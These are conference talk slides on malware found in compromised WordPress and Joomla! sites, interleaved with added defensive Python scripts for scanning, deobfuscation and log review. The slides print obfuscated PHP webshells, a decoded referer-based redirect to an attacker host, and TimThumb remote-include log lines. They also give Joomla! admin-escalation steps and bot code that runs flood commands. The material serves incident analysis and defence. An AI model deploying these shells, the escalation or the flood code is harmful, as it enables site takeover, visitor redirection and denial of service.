‘Twas the Night before Malware… Presented by Arleen Hess Pax Whitmore

Twas the night before Malware


Talk from Desert CodeCamp 2012.


Page 1: Twas the night before Malware

‘Twas the Night before Malware…

Presented by Arleen Hess and Pax Whitmore

Page 2

Twas the night before malware, and all through the house,

Not a peripheral was stirring, not even the mouse.

The plugins were arranged and running with care,

In the hopes that customers soon would be there.

Page 3

When out in the logs there arose such a clatter,

I sprang to my terminal to see what was the matter.

And what to my wondering eyes should appear,

But KAK and FilesMan were all up in here.

Page 4

The new site was running, the dev site was shed,

And users into the website were led,

WordPress in its kerchief, and Joomla! in its cap,

Had just fallen into the ol' malware trap.

Page 5

Disclaimer

• The thoughts and opinions expressed in this presentation are those of the presenters and are not a reflection of the official policies or positions of GoDaddy.com, LLC.

Page 6

About Us

Page 7

Outline

• What is malware?
• All for LULZ?
• Why look at a CMS?
• Discovering malware
• Malware examples
  – WordPress
  – Joomla!
  – FTP Compromise
• How to find and fix malware
• How to prevent malware

Page 8

What is malware?

• Short for malicious software
• Used to disrupt websites in a variety of ways
  – Redirect users to phishing sites
  – Download files onto users’ computers
  – Use exploited system as a base of DDoS or phishing attacks

Page 9

All for LULZ?

Page 10

Why look at a CMS?

• Content Management Systems are widely-used
  – WordPress 3.4 has over 23 million downloads
  – Joomla! powers over 2600 government sites
• Open-source applications are complex
• Wide range of plugins and themes

Page 11

Discovering Malware…

• Site owner alerted by users

• Users being blocked or redirected

• Found site was listed on Google Safe Browsing

Page 12

WordPress – Search

• Ran a script to search for common malicious content

2011-11-23 00:53:42 /wp-content/themes/mainstream/cache/74bd10fe94d1b17c86da24fd8df55f65.php
2012-09-09 14:19:08 /wp-content/themes/mainstream/cache/27b23905b513a0ba176072cae7f53ede.php
2012-10-24 02:40:28 /wp-content/themes/mainstream/cache/ca0f54f8f7599facfa9af8b66ac11a5f.php

Page 13

WordPress – Content strings

74bd10fe94d1b17c86da24fd8df55f65.php

GIF89a??????????!??????,?????;?
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$bery="7b17e9pVsjj8f54n307R+gwwgzHibxs79vh+W[snip]iyHw4+KGLx/jYt9xQylp4qX+7QqTvmwNSHgUHnBEgKlU81/2eylkbI2gTR7pjAHRsY4CpqSbdYG3tzrqSWRcnpPUt5vPrJ6lC87bINeAc7hVDl3tKh+VCzNwDDQnqnJnCLWGylTdAKpSc1mV7emKh5OG704OiDJKaX8rEUzG1ozt/eAnjTMAuGYX2MuwG7M7J4OhpX09AAdqgq4uLFn05UmpXeURYo2w7oqae6boO9S0QaoOEhsp6uvE1yKsYASiywIF2QsTi2YP2PQqu/Olr9nW6vCxJ4DS3Tja9fKyzmsWYqQqMizcIf8kQMzVmreD8wkr5bgzqQBDYXYuxBtKtCI3R2qkH5A4e5+sh11Q0Tr2uoNyxcF/8ZNl5bnjj2KJtdjFmpRY/GntsG/jRa8LF+Ckypw0+rpXmNldO+yb2szqAOgnnqZ0oLmL9tE0gtjrDqMzSqR1n1OFumcPabprJ6j8gEB6UqyT+T+EhWGS/icAUOlxF2Gd/1L/vWnf5anMFCDBv5Q9NpWbOPg4w9P7/2TG7wLHiMW0Uf1mQWIXPL7AoG/TI4w/Roen7eloac8Adio9dzv7WirfgeJnGg6UvPrCr/Pw==";
eval(gzinflate(str_rot13(base64_decode($bery))));

Page 14

WordPress – Content strings

27b23905b513a0ba176072cae7f53ede.php

GIF89a eval (base64_decode("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIERuZkNEMVJTRzZrRDggK

ca0f54f8f7599facfa9af8b66ac11a5f.php

/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*\x31sm*/(/*Y%>\\*/'[snip]'/*`!3'1W*/./*Py1!!Ff5>*/'ZG1Gc0x5cDdXV0VxTHlndktpdFVKa2NxJy8qOWlhLksqLy4vKltFPEpOPCovJ0wzTjBjbWx3YzJ4aGMyaGxjeThxZEhsV0tpOG9MeScvKklUdlh+di0qLy4vKlZRcyovJ3BoSlNZK0tpOGtYMUpGVVZWRlUxUXZLajl0VDA5dycvKkV3PiovLi8qVmM9SXJXZyovJ09rcDFLaTliTHlwUlJqRXBLaThuWVNjdktrMWNRVScvKjhmZCovLi8qYmFbNSovJ01xTHk0dktuUkVaMWtxTHlkell5Y3ZLbWxUZUhGTScvKjt2O3I7WyAqLy4vKis2XFQzKi8nUWxRcUwxMHZLakJtWjFjcUx5OHFOSHRtVTJBcUx5Jy8qbURzMigqLy4vKid7aHEqLydrdkttWlNXRThoTFNaQ0tpOHZLaTAyWG50eEtpOHAnLypjTXEqLy4vKkRxcyovJ0x5cHVWSFJKS2k4dkttUjNPMHNxTHpzdkttUW9KeW92Jy8qPE1NVCovKS8qRlZQbyovLyp7T15LKi8pLypRRkttZnYwKi8vKn5PSiovOy8qP2QxZldzKi8='/*XYx!oU92*/)/*3{]}s*//*,NC123~P*/)/*m!?`\*//*w!blx*/;/*upY`MI2*/
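The three files above share the same handful of tells: a GIF header glued to PHP code, eval() wrapped around base64_decode()/str_rot13()/gzinflate(), and an MD5 hash for a filename inside a theme's cache directory. The scanner below is an added example (not the presenters' search script) that walks a web root and reports which of those indicators each PHP file trips; the indicator regexes and the fixture files it scans are my own constructions, not files from the talk.

```python
"""Scan a web root for the PHP webshell indicators shown on the content-strings slides."""
import os
import re
import tempfile

# /* ... */ comments, which the third sample splices between every token of eval(base64_decode(.
COMMENT_RE = re.compile(rb"/\*.*?\*/", re.S)
# Cache files named after an MD5 hash, as on the "WordPress - Search" slide.
HASH_NAME_RE = re.compile(r"^[0-9a-f]{32}\.php$")

# Content rules, applied after comments are stripped. These regexes are my own
# assumption about what the presenters' search script looked for.
RULES = [
    ("eval_decode", re.compile(rb"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(")),
    ("rot13_gzinflate", re.compile(rb"gzinflate\s*\(\s*str_rot13\s*\(")),
    ("filesman", re.compile(rb"FilesMan")),
    ("error_reporting_off", re.compile(rb"error_reporting\s*\(\s*0\s*\)")),
]
# Legitimate themes silence warnings too, so this one only counts beside a stronger hit.
WEAK = {"error_reporting_off"}
PHP_EXT = (".php", ".phtml", ".php5", ".inc")


def classify(name, raw):
    """Return the sorted list of indicator names that fire for one file's bytes."""
    hits = []
    if HASH_NAME_RE.match(name):
        hits.append("md5_named_php")
    # A PHP file that begins with a GIF header is an upload-filter bypass, not an image.
    if name.endswith(PHP_EXT) and raw.startswith(b"GIF8"):
        hits.append("gif_polyglot")
    stripped = COMMENT_RE.sub(b"", raw)
    for rule_name, pattern in RULES:
        if pattern.search(stripped):
            hits.append(rule_name)
    if set(hits) <= WEAK:
        hits = []
    # Dozens of tiny comments between tokens only make sense as signature evasion.
    if hits and len(COMMENT_RE.findall(raw)) >= 5:
        hits.append("comment_spliced")
    return sorted(hits)


def scan_tree(root):
    """Walk root and map each suspicious PHP file path to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                hits = classify(fname, fh.read())
            if hits:
                findings[path] = hits
    return findings


# Constructed fixture files (not real malware): a benign index.php, a GIF-headed
# file with a hash name in a cache directory, and a comment-spliced eval.
SAMPLES = {
    "index.php": b"<?php\necho 'hello';\n",
    "cache/0123456789abcdef0123456789abcdef.php":
        b"GIF89a\x01\x00\x01\x00;<?php error_reporting(0);$b=\"QUJD\";"
        b"eval(gzinflate(str_rot13(base64_decode($b))));",
    "themes/x/footer.php":
        b"<?php /*gHrE*/eval/*t*/(/*_f*/base64_decode/*x*/(/*Y*/'QUJD'/*z*/)/*q*/)/*w*/;",
}


def run_demo():
    """Write the fixtures to a temp dir, scan it, and return findings keyed by relative path."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        found = scan_tree(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): h for p, h in found.items()}


if __name__ == "__main__":
    for rel, hits in run_demo().items():
        print(rel, "->", ", ".join(hits))
```

classify() takes bytes rather than a path so the same rules can be run over a backup archive or a quarantined copy, and the comment-splice count is only added on top of another hit, so an ordinary heavily commented file is not reported on its own.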

Page 15

Deobfuscation ==

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
  $referer=$_SERVER['HTTP_REFERER'];
  $uag=$_SERVER['HTTP_USER_AGENT'];
  if ($uag) {
    if (!stristr($uag,"MSIE 7.0")){
      if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun(dot)ru") or stristr($referer,"stumbleupon(dot)com") or stristr($referer,"bit(dot)ly") or stristr($referer,"tinyurl(dot)com") or preg_match("/yandex\(dot)ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace(dot)com") or stristr($referer,"facebook(dot)com") or stristr($referer,"aol(dot)com")) {
        if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
          header("Location: http://malicious(dot)evulz(dot)com/");
          exit();
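The decoded code above never had to run to be read: each wrapper is a reversible transform, so it can be peeled offline. The script below is an added example (not the presenters' tool) that strips the comment splicing, joins concatenated string literals, resolves a variable argument such as $bery, and applies the inverse of each PHP function in the chain until no eval() remains, then pulls any header("Location: ...") target out of the plaintext as an indicator. The two-layer sample it decodes is constructed in build_fixture() and redirects to the placeholder host redirect.example.invalid.

```python
"""Peel eval(gzinflate(str_rot13(base64_decode(...)))) wrappers without executing PHP."""
import base64
import re
import zlib

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")
# eval( <chain of func(> <'literal' | "literal" | $variable> )...
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:\w+\s*\(\s*)*)(?:'([^']*)'|\"([^\"]*)\"|(\$\w+))\s*\)+", re.S)
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:\s*([^'\"]+)['\"]", re.I)


def rot13_bytes(data):
    """PHP str_rot13 rotates only ASCII letters; every other byte passes through."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# PHP decoding functions and their offline equivalents (gzinflate is raw DEFLATE).
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": rot13_bytes,
    "gzinflate": lambda d: zlib.decompress(d, -zlib.MAX_WBITS),
    "gzuncompress": zlib.decompress,
    "strrev": lambda d: d[::-1],
}


def normalise(src):
    """Drop /* */ comments and join 'a'.'b' string concatenations."""
    src = COMMENT_RE.sub("", src)
    while True:
        joined = CONCAT_RE.sub(r"'\1\2'", src)
        if joined == src:
            return src
        src = joined


def peel(src):
    """Decode one eval() wrapper; return the inner source, or None if there is none."""
    src = normalise(src)
    m = EVAL_RE.search(src)
    if not m:
        return None
    funcs = re.findall(r"\w+", m.group(1))
    literal = m.group(2) if m.group(2) is not None else m.group(3)
    if literal is None:  # argument is a variable: find its string assignment
        assign = re.search(re.escape(m.group(4)) + r"\s*=\s*(?:'([^']*)'|\"([^\"]*)\")", src)
        if not assign:
            return None
        literal = assign.group(1) if assign.group(1) is not None else assign.group(2)
    data = literal.encode("latin-1")
    for fn in reversed(funcs):  # innermost function runs first
        if fn not in DECODERS:
            return None  # unknown transform: stop rather than guess
        data = DECODERS[fn](data)
    return data.decode("latin-1")


def unwrap(src, max_layers=10):
    """Return every layer from the obfuscated source down to the final plaintext."""
    layers = [src]
    for _ in range(max_layers):
        inner = peel(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def extract_redirects(src):
    """Pull header('Location: ...') targets out of decoded code as indicators."""
    return REDIRECT_RE.findall(src)


def build_fixture():
    """Constructed two-layer sample (not real malware) mirroring the slide's eval chains."""
    payload = ('if (stristr($_SERVER["HTTP_REFERER"], "bing")) '
               '{ header("Location: http://redirect.example.invalid/"); exit(); }')
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    deflated = comp.compress(payload.encode()) + comp.flush()
    inner_b64 = base64.b64encode(rot13_bytes(deflated)).decode()
    layer1 = ('<?php error_reporting(0);$bery="%s";'
              'eval(gzinflate(str_rot13(base64_decode($bery))));' % inner_b64)
    outer_b64 = base64.b64encode(layer1.encode()).decode()
    half = len(outer_b64) // 2
    layer2 = ("/*gHrE*/eval/*t)t*/(/*_f0*/base64_decode/*sm*/(/*Y*/'%s'/*W*/./*Py*/'%s'/*q*/)/*FV*/)/*OJ*/;"
              % (outer_b64[:half], outer_b64[half:]))
    return layer2, payload


if __name__ == "__main__":
    sample, _ = build_fixture()
    for depth, layer in enumerate(unwrap(sample)):
        print("layer", depth, layer[:70])
    print("redirects:", extract_redirects(unwrap(sample)[-1]))
```

An unrecognised function stops the peel instead of guessing; the right next step is to add the missing decoder, not to run the sample under php. Note the negative window-bits argument: PHP's gzinflate() consumes raw DEFLATE without a zlib header, which is why zlib.decompress() with default settings fails on these payloads.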

Page 16

WordPress – Log Review

x.x.x.x - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 404
x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php HTTP/1.1" 200
x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 200

Page 17

WordPress – What Happened?

• Attackers used thumb.php
• Three separate times
  – Over one year
• Thumb.php was not updated
• Uploaded shells were used to alter other content

Page 18

Joomla! – How it works

– Exploiting Joomla! 1.6.x/1.7.x/2.5.0-2.5.2
  • index.php?option=com_users&view=registration
– Start to register a user account
– Cause the registration process to fail
  • Failing to enter the same pwd twice
  • Failing the captcha
– Before submitting elevate user privilege to admin
  • Firebug: <input name="jform[groups][]" value="7" />
  • Tamper Data: jform[groups][]=7
– Complete registration when the form reloads

Page 19

Joomla!

• Sample logs showing the registration of the malicious user:

x.x.x.x - - [02/Aug/2012:09:03:32 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303
x.x.x.x - - [02/Aug/2012:09:03:34 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303

Page 20

Joomla!

• Sample logs showing the error.php file being edited:

x.x.x.x - - [04/Aug/2012:00:31:17 -0700] "POST evulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:23 -0700] "POST evulz.tld/administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:25 -0700] "POST evulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:28 -0700] "POST evulz.tld/administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303
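The log excerpts from the WordPress and Joomla! cases (thumb.php fetching a remote script, then a self-registered account editing a template through the administrator) are request patterns that a few rules over the access log can catch. The script below is an added example, not part of the talk: it parses combined-format lines, flags thumb.php calls whose src= is a URL rather than a local path, flags POSTs to registration.register and to com_templates&layout=edit, and raises a combined alert when the template edit comes from an IP that registered itself earlier in the same log. The sample lines are constructed after the slides, with documentation-range client addresses in place of the x.x.x.x placeholders.

```python
"""Flag TimThumb remote-fetch and Joomla! self-registration/template-edit patterns in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-format prefix: client, identd, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def parse_line(line):
    """Split one access-log line into fields, with the query string decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def flags_for(rec):
    """Per-request rules drawn from the WordPress and Joomla! log slides."""
    flags = []
    path = rec["path"].lower()
    query = rec["query"]
    # thumb.php resizing a local image is normal; fetching a URL is the remote-include abuse.
    if path.endswith("thumb.php"):
        if any("://" in src for src in query.get("src", [])):
            flags.append("timthumb_remote_src")
    if rec["method"] == "POST" and query.get("task") == ["registration.register"]:
        flags.append("joomla_registration")
    if "/administrator/" in path and query.get("option") == ["com_templates"] \
            and query.get("layout") == ["edit"]:
        flags.append("joomla_template_edit")
    return flags


def analyse(lines):
    """Run the rules over chronological lines and correlate registration with template edits."""
    events = []
    self_registered = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        flags = flags_for(rec)
        if "joomla_registration" in flags:
            self_registered.add(rec["ip"])
        if "joomla_template_edit" in flags and rec["ip"] in self_registered:
            flags.append("self_registered_then_template_edit")
        if flags:
            events.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                           "path": rec["path"], "flags": flags})
    return events


# Constructed log lines modelled on the slides; client IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.9 - - [02/Aug/2012:09:03:32 -0700] "POST /component/users/?task=registration.register HTTP/1.1" 303 -
198.51.100.9 - - [04/Aug/2012:00:31:23 -0700] "POST /administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303 -
192.0.2.10 - - [04/Aug/2012:10:00:00 -0700] "POST /administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303 -
203.0.113.7 - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 404 512
203.0.113.7 - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php HTTP/1.1" 200 1024
203.0.113.7 - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 200 2048
198.51.100.4 - - [09/Sep/2012:14:20:00 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=/wp-content/uploads/a.jpg&w=100 HTTP/1.1" 200 3000
"""


def run_demo():
    return analyse(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ev in run_demo():
        print(ev["ts"], ev["ip"], ev["status"], ev["path"], ",".join(ev["flags"]))
```

The 404 on the first thumb.php probe is still reported on purpose: the attacker tried the wrong directory once before finding the live copy, and that miss is the earliest warning the log holds. A template edit from an address with no registration in the log is reported on its own as a lower-confidence event, since it may be a legitimate administrator.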

Page 21

Joomla! - Content

error_reporting(0);
$base = dirname(__FILE__)."/";
function stoped() {
  unlink($base."stph.php");
  unlink($base."stcp.php");
  cmdexec("killall ping;");
  cmdexec("killall -9 perl; killall -9 perl-bin;killall -9 perl-cgi;");
  unlink($base."start.php");
  unlink($base."f1.pl");
  unlink($base."run.pl");
  unlink($base."startphp.php");
  print "<stopcleandos>Stop & Clean</stopcleandos>";
function UploadFile($File){
  cmdexec("killall -9 perl");
  cmdexec("killall -9 perl-bin");
  cmdexec("killall -9 perl-cgi");
  $target_path ="./";
  $target_path = $target_path . basename( $File['name']);
  @move_uploaded_file($File['tmp_name'], $target_path);
}
function cmdexec($cmd){
  if(function_exists('exec'))@exec($cmd);
  elseif(function_exists('shell_exec'))@shell_exec($cmd);

Page 22

Joomla! - Content

$up = "<?php eval(gzinflate(base64_decode('[snip]')));

Page 23

Joomla! - Content

switch($_POST['action']){
  case "upload":
    UploadFile($_FILES['file']);
    break;
  case "stop":
    stoped();
    break;
  case "ust":
    $page = curPageURL();
    $ip = $_POST['ip'];
    $port = "11";
    $out = $page."\n";
    $socket = stream_socket_client("udp://$ip:$port");
    if ($socket) {
      stream_set_write_buffer($socket, 0);
      stream_socket_sendto($socket,$out);
    }
    fclose($socket);
    break;
  case "ab":
    $url = $_POST['url'];
    $c = $_POST['c'];
    $n = $_POST['n'];
    cmdexec("ab -c $c -n $n $url");
    break;
  default:
    DNullRequest();
    break;
}

Page 24

The moral of the Joomla! Story…

Page 25

FTP Compromise

2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [15608] created SomeMaliciousFile.exe
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608] closed - - 426 0 0 - -
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608] created /MyRealUser/Dir1/MyDownloaderSetupFull.exe
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] USER MyRealUser
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] PASS - - 230 0 0 - -
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] CWD /MyRealUser/Dir1
2012-10-18 22:12:06 x.x.x.x MyRealUser 21 [14609] appended /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:16:45 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:19:56 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:21:07 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:34:05 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:37:42 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:46:51 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:48:14 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:51:20 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:51:56 x.x.x.x MyRealUser 21 [14711] created SomeMaliciousFile.exe - 550 0 240120 -
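Nothing in the FTP log above is a failed login; the session authenticated normally as MyRealUser. What gives it away is behaviour: .exe files written into the site, the same file re-created every few minutes, and several sessions open from one client at once. The script below is an added example (not from the talk) that parses the log format shown, applies those three checks, and returns the findings. The sample log is constructed to mirror the slide, with a documentation-range address standing in for x.x.x.x.

```python
"""Triage an FTP transfer log for the upload pattern shown on the FTP Compromise slide."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "<date> <time> <client ip> <user> <port> [<session>] <verb> <rest>", as on the slide.
FTP_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\d+) \[(\d+)\]\s*(\S+)\s*(.*)$")
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".dll", ".pl")
WRITE_VERBS = {"created", "appended"}


def parse_ftp_line(line):
    """Split one log line into fields; the first token after the verb is the path."""
    m = FTP_RE.match(line)
    if not m:
        return None
    ts, ip, user, port, session, verb, rest = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "ip": ip, "user": user,
            "session": session, "verb": verb, "path": rest.split()[0] if rest else ""}


def analyse_ftp(lines, window=timedelta(minutes=30), rewrite_threshold=3, session_threshold=3):
    """Return executable uploads, files rewritten repeatedly, and clients running parallel sessions."""
    events = [e for e in (parse_ftp_line(l) for l in lines) if e]
    exe_uploads = [(e["ts"].isoformat(sep=" "), e["session"], e["path"]) for e in events
                   if e["verb"] in WRITE_VERBS and e["path"].lower().endswith(EXEC_EXT)]
    # The same file written again and again within minutes: an automated loop, not a person.
    writes = defaultdict(list)
    for e in events:
        if e["verb"] in WRITE_VERBS:
            writes[e["path"]].append(e["ts"])
    rewrites = {p: len(ts) for p, ts in writes.items()
                if len(ts) >= rewrite_threshold and max(ts) - min(ts) <= window}
    # Several sessions from one client inside the window, another sign of a tool at work.
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    parallel = {}
    for ip, evs in by_ip.items():
        peak = max(len({o["session"] for o in evs if abs(o["ts"] - a["ts"]) <= window})
                   for a in evs)
        if peak >= session_threshold:
            parallel[ip] = peak
    return {"executable_uploads": exe_uploads, "repeated_rewrites": rewrites,
            "parallel_sessions": parallel}


# Constructed sample modelled on the slide (the client IP is a documentation address).
SAMPLE_FTP_LOG = """\
2012-10-18 22:08:22 203.0.113.9 MyRealUser 21 [14711] USER MyRealUser
2012-10-18 22:08:22 203.0.113.9 MyRealUser 21 [14711] PASS - - 230 0 0 - -
2012-10-18 22:08:22 203.0.113.9 MyRealUser 21 [14711] CWD /MyRealUser/Dir1
2012-10-18 22:08:22 203.0.113.9 MyRealUser 21 [14608] created /MyRealUser/Dir1/MyDownloaderSetupFull.exe
2012-10-18 22:12:06 203.0.113.9 MyRealUser 21 [14609] appended /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:16:45 203.0.113.9 MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:19:56 203.0.113.9 MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:21:07 203.0.113.9 MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-19 09:00:00 198.51.100.2 MyRealUser 21 [15000] created /MyRealUser/Dir1/index.html
"""


def run_demo():
    return analyse_ftp(SAMPLE_FTP_LOG.splitlines())


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

Because the attacker used the real credentials from the owner's own address (the next slide's point), a source-IP allow-list would not have fired here; the rewrite loop and the parallel sessions are the signals worth alerting on, and the single index.html upload the following morning correctly produces nothing.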

Page 26

How FTP Gets Compromised

• Keyloggers or other malicious software on your computer

• Gaining FTP access via your own credentials and IP

Page 27

How to find and fix malware

• Automated tools or scripts search for common phrases or exploits
• Check commonly affected files, such as .htaccess, header.php, footer.php, etc.
• Check for odd filenames or typos (e.g. indx.php vs. index.php)
• Review and edit each file individually
• Restore from clean backups (which everyone keeps, right?)
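Two of the checks above lend themselves to automation: the typo'd filename (indx.php vs. index.php) and the injected .htaccess. The script below is an added example, not from the talk: it flags filenames within edit distance 2 of a known core file, and reads an .htaccess looking for RewriteRules that send visitors off-site (especially when keyed on the referer, as the decoded WordPress payload was), auto_prepend_file directives, and off-site ErrorDocuments. The known-file list, the directory listing and both sample .htaccess files are my own constructions.

```python
"""Spot lookalike filenames and injected .htaccess rules, two checks from the find-and-fix slide."""
import re

# Files a WordPress or Joomla! root normally contains (assumption: my own short list).
KNOWN_FILES = {"index.php", "wp-config.php", "wp-login.php", "wp-settings.php",
               "header.php", "footer.php", "functions.php", ".htaccess", "configuration.php"}


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalikes(names, max_distance=2):
    """Names that are almost, but not exactly, a known file: indx.php, .htacess, wp-confg.php."""
    found = []
    for name in names:
        if name in KNOWN_FILES:
            continue
        closest = min(KNOWN_FILES, key=lambda k: levenshtein(name, k))
        if levenshtein(name, closest) <= max_distance:
            found.append((name, closest))
    return found


PREPEND_RE = re.compile(r"^\s*php_(?:value|flag)\s+auto_(?:prepend|append)_file", re.I | re.M)
ERRORDOC_RE = re.compile(r"^\s*ErrorDocument\s+\d+\s+https?://", re.I | re.M)


def htaccess_findings(text):
    """Flag rewrite rules that send visitors off-site, especially when keyed on the referer."""
    findings = []
    conds = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.lower().startswith("rewritecond"):
            conds.append(stripped)
            continue
        if stripped.lower().startswith("rewriterule"):
            parts = stripped.split()
            target = parts[2] if len(parts) > 2 else ""
            if re.match(r"https?://", target, re.I):
                keyed = any(re.search(r"HTTP_REFERER|HTTP_USER_AGENT", c, re.I) for c in conds)
                findings.append("conditional_external_redirect" if keyed else "external_redirect")
            conds = []  # each RewriteRule consumes the RewriteConds above it
    if PREPEND_RE.search(text):
        findings.append("auto_prepend_file")
    if ERRORDOC_RE.search(text):
        findings.append("external_errordocument")
    return findings


# Constructed samples: a directory listing with three typo'd names, and two .htaccess files.
SAMPLE_NAMES = ["index.php", "indx.php", ".htaccess", ".htacess", "wp-confg.php",
                "style.css", "single.php", "readme.txt", "header.php"]
BENIGN_HTACCESS = """\
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""
INJECTED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing) [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/ [R=301,L]
"""

if __name__ == "__main__":
    print("lookalikes:", lookalikes(SAMPLE_NAMES))
    print("benign .htaccess:", htaccess_findings(BENIGN_HTACCESS))
    print("injected .htaccess:", htaccess_findings(INJECTED_HTACCESS))
```

The standard WordPress rewrite block passes clean because its rule targets are "-" and a local path; the injected one is caught both for the off-site target and for the HTTP_REFERER condition that hides it from an owner visiting the site directly, the same trick the decoded payload on the deobfuscation slide used in PHP.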

Page 28

How to prevent malware

• Keep your web application up-to-date
• Regularly check your content
